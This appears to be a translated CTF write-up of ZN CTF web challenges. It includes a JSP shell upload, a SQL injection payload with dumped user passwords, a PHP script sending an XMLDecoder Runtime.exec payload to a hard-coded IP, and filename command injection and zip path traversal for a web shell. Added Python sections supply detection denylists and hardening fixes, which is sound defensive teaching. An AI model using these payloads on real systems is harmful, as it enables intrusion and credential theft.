When creating an order, you can intercept the form submission in Burp, change the orderName field to anything.jsp, and put the text of any JSP shell into the order field.
After uploading, open the shell (the "You can check your order here" link) and download Tomcat's webapps directory. In it we find JSP files and compiled classes; decompiling one of them with the jad utility (WEB-INF/classes/ZN_Chocolate/CRYPTO/SecretGrandParentForBigBossesNeeds.class) reveals the key we need:
private String TrueSecretChocolateKey() { return "ZNV:iMp0518UrU_53cR3T_k3y_50d11dcb46506e93917f82c0e828b1a9"; }
Input
Site with file upload functionality.
A JSP shell in XML format, bypassing the whitelist. After that all participants were given the source code.
The task could again be solved the "cheating" way, by reading the source code.
Output
Open the classes in JD-GUI.
We can see the code of the JSP checker, which parses the page imports. There are many ways to bypass this check, but bypassing it alone doesn't give the flag. Initially the flag lives in SecretGrandParentForBigBossesNeeds.class:
public class SecretGrandParentForBigBossesNeeds {
    private String TrueSecretChocolateKey() {
        return "ZNV:3X@mPl3_k3y_a0a81ab87f74d307b8e51fd85048e714";
    }
}
Reflection is clearly the way to go. If we try to import SecretGrandParentForBigBossesNeeds we fail, so let's try importing Secret instead:
<%@ page import="java.lang.reflect.*,ZN_Chocolate.CRYPTO.Secret" %>
<%
    Secret s = new Secret();
    out.println(s.TrueSecretChocolateKey());
%>
Hm, error 500... and the message says "method TrueSecretChocolateKey of SadBigBoss is not visible".
Aha! So the source code was changed after the fix. Either way, the method is not visible because it's private. Let's use reflection to make it accessible:
<%@ page import="java.lang.reflect.*,ZN_Chocolate.CRYPTO.Secret" %>
<%
    SadBigBoss s = new SadBigBoss();
    Method method = s.getClass().getDeclaredMethod("TrueSecretChocolateKey");
    method.setAccessible(true);
    out.println(method.invoke(s));
%>
That's it, the flag is on the page =)
1. Found admin.jsp, search.jsp, index.jsp, admin_login.jsp, adminochka.jsp and adminochka.jsp.bak
2. I missed test / test (apparently someone added it)
3. Injection
potato 'AND' 1 \ '' = 1 union select 1, (select user ()), 3 - '=' 1%
host: zn-java
version: 5.5.46-0ubuntu0.14.04.2
user: webappuser @ localhost
wepapp.developers
+----+-----------------+--------------+
| id | username        | password     |
+----+-----------------+--------------+
| 0  | developer_Vasia | fpBA7BPlS8wJ |
| 1  | developer_Jorik | 5FftW6Aua2ef |
+----+-----------------+--------------+

wepapp.goods
+----+----------+-------+
| id | name     | price |
+----+----------+-------+
| 0  | potato   | 40    |
| 1  | apple    | 100   |
| 2  | carrot   | 25    |
| 3  | tomato   | 120   |
| 4  | pear     | 70    |
| 5  | tomato   | 110   |
| 12 | pear     | 80    |
| 13 | cucumber | 80    |
+----+----------+-------+

wepapp.users
+----+----------+----------+
| id | username | password |
+----+----------+----------+
...
4. Compiled the client and recorded its traffic.
5. RCE through xml deserialization (solve.php)
solve.php:
<?php
$x = <<<HTML
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0_05" class="java.beans.XMLDecoder">
  <object id="_response" class="java.lang.String">
    <string>Mode 1 to get a value</string>
  </object>
  <object id="runtime" class="java.lang.Runtime" method="getRuntime">
    <void id="process" method="exec">
      <string>cat webapps/flag.txt</string>
    </void>
  </object>
  <object idref="process">
    <void id="inputStream" method="getInputStream"/>
  </object>
  <object id="inputStreamReader" class="java.io.InputStreamReader">
    <object idref="inputStream"/>
  </object>
  <object id="bufferedReader" class="java.io.BufferedReader">
    <object idref="inputStreamReader"/>
  </object>
  <object idref="bufferedReader">
    <void id="line1" method="readLine"/>
  </object>
  <object idref="bufferedReader">
    <void id="line2" method="readLine"/>
  </object>
  <string id="response">
    <object idref="line1"/>
    <object idref="line2"/>
  </string>
  <object class="org.restlet.Response" method="getCurrent">
    <void method="setEntity">
      <object idref="response"/>
      <object class="org.restlet.data.MediaType" field="TEXT_HTML"></object>
    </void>
  </object>
</java>
HTML;

// Keep retrying until the connection is established.
do {
    $socket = fsockopen("107.170.122.167", 80);
} while (!$socket);

// Raw HTTP/1.0 request; the body is the XMLDecoder document above.
$packet  = "POST /ZN_HQ/API/prods HTTP/1.0\r\n";
$packet .= "Content-Type: application/x-java-serialized-object+xml\r\n";
$packet .= "Host: 107.170.122.167\r\n";
$packet .= "Connection: Close\r\n";
$packet .= "Content-Length: " . strlen($x) . "\r\n";
$packet .= "Authorization: Basic ZGV2ZWxvcGVyX1Zhc2lhOmZwQkE3QlBsUzh3Sg==\r\n";
$packet .= "\r\n";
$packet .= $x;

fwrite($socket, $packet);
while (!@feof($socket)) {
    echo fread($socket, 4096);
}
fclose($socket);
?>
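The root cause here is an endpoint that feeds a client-supplied body to java.beans.XMLDecoder, which will happily instantiate any class and call any method named in the document, so the only real fix is to stop deserializing untrusted input that way. Until that is done, a request filter or log rule can at least recognise the shape of such a document. The following is an added example (not part of the original write-up or the task's code): a small Python checker that parses a body with the XMLDecoder content type and flags the classes and method names that never belong in a legitimate data document. The sample body and the denylists are constructed here and are assumptions; the content type and the envelope element come from the request shown above.

```python
import xml.etree.ElementTree as ET

# Constructed denylists (assumption): classes and method names that have no
# place in a data document but are the core of XMLDecoder command execution.
DANGEROUS_CLASSES = {
    "java.lang.Runtime",
    "java.lang.ProcessBuilder",
    "java.lang.reflect.Method",
}
DANGEROUS_METHODS = {"getRuntime", "exec", "start", "invoke"}

ENVELOPE = "XMLDecoder document envelope"


def xmldecoder_findings(body: str) -> list:
    """Return a list of human-readable findings for one request body."""
    try:
        root = ET.fromstring(body)  # ElementTree does not resolve external entities
    except ET.ParseError as exc:
        return [f"unparseable XML: {exc}"]
    findings = []
    if root.tag == "java" and root.get("class") == "java.beans.XMLDecoder":
        findings.append(ENVELOPE)
    for el in root.iter():
        cls = el.get("class")
        if cls in DANGEROUS_CLASSES:
            findings.append(f'<{el.tag} class="{cls}">')
        method = el.get("method")
        if method in DANGEROUS_METHODS:
            findings.append(f'<{el.tag} method="{method}">')
    return findings


def classify_request(content_type: str, body: str) -> str:
    """'allow' for other content types, 'log' for a plain XMLDecoder document,
    'block' when a dangerous class/method (or unparseable XML) is present."""
    if "x-java-serialized-object" not in content_type.lower():
        return "allow"
    findings = xmldecoder_findings(body)
    return "block" if any(f != ENVELOPE for f in findings) else "log"


# Constructed sample bodies (assumption), mirroring the structure seen above.
MALICIOUS_BODY = """<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0_05" class="java.beans.XMLDecoder">
  <object id="runtime" class="java.lang.Runtime" method="getRuntime">
    <void id="process" method="exec"><string>echo constructed</string></void>
  </object>
</java>"""

BENIGN_BODY = """<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0_05" class="java.beans.XMLDecoder">
  <object class="java.lang.String"><string>Mode 1 to get a value</string></object>
</java>"""

if __name__ == "__main__":
    ct = "application/x-java-serialized-object+xml"
    print(classify_request(ct, MALICIOUS_BODY), xmldecoder_findings(MALICIOUS_BODY))
    print(classify_request(ct, BENIGN_BODY), xmldecoder_findings(BENIGN_BODY))
```

The checker is a detection aid, not a boundary: a denylist of class names can be worked around by other gadget classes, which is why the `log` outcome for any XMLDecoder document is kept and why removing the deserialization endpoint is the actual remediation.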
Input
Site (0x3d.ru) with OAuth (vk.com) functionality.
During recon one can find the content.0x3d.ru and dev.0x3d.ru (127.0.0.1) subdomains.
Output
There were a lot of unintended bugs, including XSS, SQL injection, RCE, etc.
1. Authentication bypass (unintended)
If you log in in a private tab, you end up logged in as a privileged user, which can upload files.
2. Authentication bypass
Once logged in, you need the privileged user to load two images (<img src=...>): the first triggers a logout CSRF (like /logout), the second is your auth-token link. He follows them when he visits your profile. Now you can log in as the privileged user.
3. Race condition (unintended)
A privileged user can upload an avatar. "*.php" is disallowed, but ".jpg.php" is OK =) Where's the shell? Hm, avatars are uploaded to content.0x3d.ru/avatars, but they are converted into $hash.jpg. The file is uploaded first and converted afterwards.
Take Burp Suite, launch 100 threads (GET /avatars/beched.jpg.php, Host: content.0x3d.ru) and upload beched.jpg.php. Wow, 200! Shit, plain text... They disabled PHP in this directory, but this is a dangerous bug anyway.
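The window exploited above exists because the upload is written under its client-chosen name into the served directory and only renamed to $hash.jpg afterwards. The usual fix is to never let the served directory see anything but the final artefact: stage the upload outside the web root under a server-generated name, convert it, and publish it with a single atomic rename. The following Python is an added illustration of that pattern, not code from the write-up or the 0x3d.ru site; the directory names, the use of a SHA-256 digest as the published name, and the stand-in "conversion" step are assumptions.

```python
import hashlib
import os
import tempfile


def publish_avatar(data: bytes, served_dir: str, staging_dir: str) -> str:
    """Stage outside the web root, convert, then publish atomically.

    The client's original filename is never used on the filesystem, and the
    served directory only ever contains finished files under the final name.
    """
    # 1. Stage under a random server-chosen name, outside the served tree.
    fd, staged = tempfile.mkstemp(prefix="upload-", dir=staging_dir)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)

    # 2. Convert. Stand-in for re-encoding the image (assumption): the final
    #    name is derived from the content hash, so it is fixed by the server.
    digest = hashlib.sha256(data).hexdigest()
    final_name = digest + ".jpg"

    # 3. Publish with one atomic rename. os.replace is atomic only when both
    #    paths are on the same filesystem, so staging_dir must live there.
    os.replace(staged, os.path.join(served_dir, final_name))
    return final_name


def demo() -> dict:
    """Run the flow in a scratch directory and report what each dir contains."""
    root = tempfile.mkdtemp()
    served = os.path.join(root, "avatars")    # stands in for the served dir
    staging = os.path.join(root, "staging")   # outside the web root
    os.makedirs(served)
    os.makedirs(staging)
    # Constructed upload: a few JPEG-looking bytes plus a client-chosen name
    # that would have been dangerous if it had been used directly.
    name = publish_avatar(b"\xff\xd8\xff constructed jpeg bytes", served, staging)
    return {
        "published": name,
        "served": sorted(os.listdir(served)),
        "staging": sorted(os.listdir(staging)),
    }


if __name__ == "__main__":
    print(demo())
```

Because the served path is created by the rename in step 3, there is no moment at which a request for the client's filename can hit a half-processed file, which is the race the write-up won with 100 parallel requests.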
4. SQL injection (unintended)
It was a multi-row INSERT, and the fields had to be guessed. There was no link for the auth bypass. I found a working copy of the task on that server =)
5. Code execution (unintended)
So, we've got the author's testing server. Let's log in and check the SQL injection there. Wow, file_priv = Y! Read the source code, read the configs, no flag =(
But there's something else in ZIP upload functionality:
elseif (preg_match('/[.](ZIP)|(zip)|(RAR)|(rar)$/', $_FILES['fupload']['name'])) {
    $avatar   = 'avatars/net-avatara.jpg';
    $filename = $_FILES['fupload']['name'];
    $source   = $_FILES['fupload']['tmp_name'];
    $target   = $path_to_90_directory . $filename;
    move_uploaded_file($source, $target); // $path_to_90_directory
    // The client-controlled filename is concatenated straight into a shell command line.
    $command = 'python /var/www/0x3d.ru/zn1/avatars/unzip.py /var/www/0x3d.ru/zn1/avatars/' . $filename;
    $temp = exec($command, $output);
}
So we can execute code via the filename. But there's no flag on this test server %)
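Two defects combine in the snippet above: the extension regex is not what its author thinks it is (only the last alternative is anchored with $ and only the first requires a dot, so "zip" anywhere in the name passes), and the accepted name is then concatenated into a shell command. The following Python is an added example, not code from the write-up or from the 0x3d.ru application, that reproduces the page's regex for analysis next to a hardened check, and builds the unzip invocation as an argv list so no shell ever parses the name. The script path and avatar directory are those from the snippet; the hardened pattern and the sample filenames are constructed assumptions.

```python
import re

# The page's original whitelist, reproduced unchanged for analysis. PCRE and
# Python's re agree on this pattern: the alternation is "[.]ZIP" OR "zip" OR
# "RAR" OR "rar-at-end", so e.g. "zipper.php" or "a.zip;echo x" both match.
ORIGINAL_RE = re.compile(r"[.](ZIP)|(zip)|(RAR)|(rar)$")

# Hardened check (assumption): whole-name match, one extension, anchored at the
# end, case-insensitive, and a restricted character set for the base name.
SAFE_NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}\.(zip|rar)$", re.IGNORECASE)

# Paths taken from the PHP snippet above.
UNZIP_SCRIPT = "/var/www/0x3d.ru/zn1/avatars/unzip.py"
AVATAR_DIR = "/var/www/0x3d.ru/zn1/avatars/"


def original_check(name: str) -> bool:
    """What the page's preg_match actually accepts."""
    return ORIGINAL_RE.search(name) is not None


def hardened_check(name: str) -> bool:
    """Strip any client-supplied directory part, then require a strict shape."""
    base = name.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]
    return SAFE_NAME_RE.fullmatch(base) is not None


def build_unzip_argv(name: str) -> list:
    """Command as an argv list (what you would pass to subprocess.run without
    shell=True); raises ValueError instead of accepting a bad name."""
    if not hardened_check(name):
        raise ValueError(f"rejected filename: {name!r}")
    base = name.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]
    return ["python", UNZIP_SCRIPT, AVATAR_DIR + base]


def build_shell_command(name: str) -> str:
    """What the PHP does: the raw name lands inside a shell command string."""
    return "python " + UNZIP_SCRIPT + " " + AVATAR_DIR + name


if __name__ == "__main__":
    # Constructed sample names.
    for n in ["photo.zip", "ARCHIVE.RAR", "zipper.php", "photo.zip;echo injected"]:
        print(f"{n!r:30} original={original_check(n)!s:5} hardened={hardened_check(n)}")
```

Even with the hardened name check, passing an argv list rather than a command string is the change that removes the injection class entirely; the regex fix only narrows what reaches it.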
6. Code execution
Now let's do what they intended. Let's upload the shell into the docroot of content.0x3d.ru. We'll do it with github.com/ptoomey3/evilarc.
Create a ZIP file with path traversal, and now we've got a PHP shell on content.0x3d.ru.
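The traversal above works because the server-side unzip writes entry names from the archive as-is, so an entry like "../../htdocs/x.php" lands in the web root. The defence is to resolve every entry against the destination before writing anything and refuse the whole archive if one escapes. The following Python is an added example, not code from the write-up or the task's unzip.py: a validator that flags absolute and traversing entries, a wrapper that extracts only clean archives, and two constructed archives to exercise it. (Python's own ZipFile.extractall already strips such components, so the explicit check mainly shows what a hand-written unzip helper in any language needs to do.) Entry names and destination paths are constructed assumptions.

```python
import io
import os
import tempfile
import zipfile


def unsafe_entries(zip_bytes: bytes, dest: str) -> list:
    """Names of entries that would be written outside `dest` on extraction."""
    dest_real = os.path.realpath(dest)
    bad = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            # Absolute POSIX paths, UNC-style names and drive letters: never acceptable.
            if name.startswith(("/", "\\")) or (len(name) > 1 and name[1] == ":"):
                bad.append(name)
                continue
            # Resolve the would-be target and require it to stay under dest.
            target = os.path.realpath(os.path.join(dest_real, *name.split("/")))
            if os.path.commonpath([dest_real, target]) != dest_real:
                bad.append(name)
    return bad


def safe_extract(zip_bytes: bytes, dest: str) -> list:
    """Extract only if every entry is clean; returns the top-level names written."""
    bad = unsafe_entries(zip_bytes, dest)
    if bad:
        raise ValueError(f"refusing to extract; unsafe entries: {bad}")
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        zf.extractall(dest)
    return sorted(os.listdir(dest))


def build_zip(entries: dict) -> bytes:
    """Build an in-memory archive from {entry_name: content} (constructed data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)  # writestr keeps the name exactly as given
    return buf.getvalue()


# Constructed archives (assumption): one with traversal/absolute entries, one clean.
TRAVERSAL_ZIP = build_zip({
    "avatar.jpg": b"\xff\xd8\xff",
    "../../htdocs/shell.php": b"<?php /* constructed placeholder */ ?>",
    "/etc/cron.d/x": b"",
})
CLEAN_ZIP = build_zip({
    "avatar.jpg": b"\xff\xd8\xff",
    "thumbs/small.jpg": b"\xff\xd8\xff",
})


def demo_clean_extract() -> list:
    """Extract the clean archive into a scratch directory."""
    return safe_extract(CLEAN_ZIP, tempfile.mkdtemp())


if __name__ == "__main__":
    print(unsafe_entries(TRAVERSAL_ZIP, "/var/www/avatars"))
    print(demo_clean_extract())
```

Checking before writing, rather than cleaning up afterwards, matters here for the same reason as in the avatar race above: a file that exists in the web root for even a moment can be fetched.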
7. open_basedir bypass (unintended)
Command-line functions are disabled, but we can browse any directory with DirectoryIterator: ahack.ru/releases/glob_wrapper_open_basedir_exploit.php.txt
Btw, putenv() and mail() are not disabled.
8. Flag
Remember dev.0x3d.ru? Let's try it from the web shell:
readfile('http://dev.0x3d.ru');
$ nmap -p 5060 -T4 -A -v bank.defcon.su
.....
PORT     STATE SERVICE   VERSION
5060/tcp open  sip-proxy Asterisk PBX 11.17.1
|_sip-methods: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO, PUBLISH, MESSAGE
.......
Source: https://habr.com/ru/post/271431/